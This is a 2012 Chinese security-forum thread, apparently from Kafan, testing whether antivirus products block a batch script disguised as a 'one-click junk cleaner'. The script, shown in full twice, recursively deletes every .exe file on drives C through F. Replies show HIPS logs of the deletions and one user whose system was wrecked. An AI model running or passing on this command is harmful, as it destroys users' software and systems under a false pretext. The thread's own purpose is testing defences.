┃● ●┃ 批处理再战安全软件 ┃● ●┃（实机运行测试）测主防 测监控 第一季

龙而非.

这里的有几个朋友很搞笑

http://bbs.kafan.cn/thread-1307341-1-1.html

23楼 25楼（麻烦您看看您的文本文档还能使用吗？和压缩软件？）


====================分割线========================



今天最新的样本是我在一个论坛获取的（目前下载量超过了5万次人数）

一键清理 全面清理电脑垃圾 来自美国国防部的技术.......让您的系统一干二净 干干净净


源码：

@echo off
for %%a  in (c d e f) do (
del /q /f /s "%%a:\*.exe"
)



对此出现的问题个人不负责......

该批处理会是删除了所有盘符下的大部分EXE可执行文件



如果安全软件不拦截的话 确实不好

因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....如果能看懂的应该是懂电脑的.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

而且在论坛里下载量超级高....破坏面 传播面也是相当广泛

实机运行测试 测主防 测监控 看看你的安全软件是否拦截有提示......

360主防拦截 杀毒扫描不出来（提示太多就不一个一个上图了）






好了不要说那么多废话了 真没意思，测试吧大家，不要转移话题

是不是你们的没拦截啊？所以一直在狡辩 转移话题 不愿意承认？.....




我不回答任何无意义的回复了，请测试，用事实说话.......


http://bbs.kafan.cn/forum-31-1.html 【第二季】

龙而非.

今天最新的样本是我在一个论坛获取的（目前下载量超过了5万次人数）

一键清理 全面清理电脑垃圾 来自美国国防部的技术.......让您的系统一干二净 干干净净

源码：

@echo off
for %%a  in (c d e f) do (
del /q /f /s "%%a:\*.exe"
)

如果安全软件不拦截的话 确实不好

因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....如果能看懂的应该是懂电脑的.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

而且在论坛里下载量超级高....破坏面 传播面也是相当广泛

实机运行测试 测主防 测监控 看看你的安全软件是否拦截有提示......

360主防拦截 杀毒扫描不出来（提示太多就不一个一个上图了）




好了不要说那么多废话了 真没意思，测试吧大家，不要转移话题

是不是你们的没拦截啊？所以一直在狡辩 转移话题 不愿意承认？.....




我不回答任何无意义的回复了，请测试，用事实说话.......

  

hddu

HIPS均可防。

2012-06-14 14:31:53    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\2y[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:54    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\3t[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:54    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\4i[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:54    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\6h[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:56    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\A5CZILY5\5c[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:58    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\AZCSRX5N\GGSetup[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:32:05    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F8C1AE91\IPmana_2.82[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:32:05    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F8C1AE91\Setup_WAS_ch3689[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:32:10    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\GPIVKDIJ\7[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*

龙而非.

hddu 发表于 2012-6-14 14:34
HIPS均可防。

2012-06-14 14:31:53    删除文件      操作:允许

HIPS当然会防了 但是有几个一般大众用户会使用HIPS呢？

能使用HIPS的最起码也要有一点电脑基础能力吧？

如果安全软件不拦截的话 确实不好

因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....如果能看懂的应该是懂电脑的.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

而且在论坛里下载量超级高....破坏面 传播面也是相当广泛

实机运行测试 测主防 测监控 看看你的安全软件是否拦截有提示......（这里说的安全软件是一般大众所使用的）

消停

龙而非. 发表于 2012-6-14 14:35
HIPS当然会防了 但是有几个一般大众用户会使用HIPS呢？

能使用HIPS的最起码也要有一点电脑基础能力吧 ...

我同意你的观点！别说一半大众，就是在卡饭混很久的人中，又有几个人真正用的明白！？

hddu

用毒霸，猜测毒霸不防，因毒霸对批处理不重度感冒。

00315

这东西.....杀软拦截严了，喜欢写批处理的就等着哭吧

a256886572008

防破壞，最好用 重定向沙盤

龙而非.

00315 发表于 2012-6-14 14:44
这东西.....杀软拦截严了，喜欢写批处理的就等着哭吧

能写批处理的最起码也要有一点电脑基础能力吧？

一般用户有几个懂这个的？因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....

而且一般也使用不到这些啊....

如果能看懂的应该是懂电脑的.....最起码有点这方面的能力吧....

懂的话 要使用 你自己用就行了 关闭安全软件使用也可以啊.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

所以安全软件还是防御的好.....

消停

fs扫描+双击过，我没等跑完就关了，但是系统还是悲剧了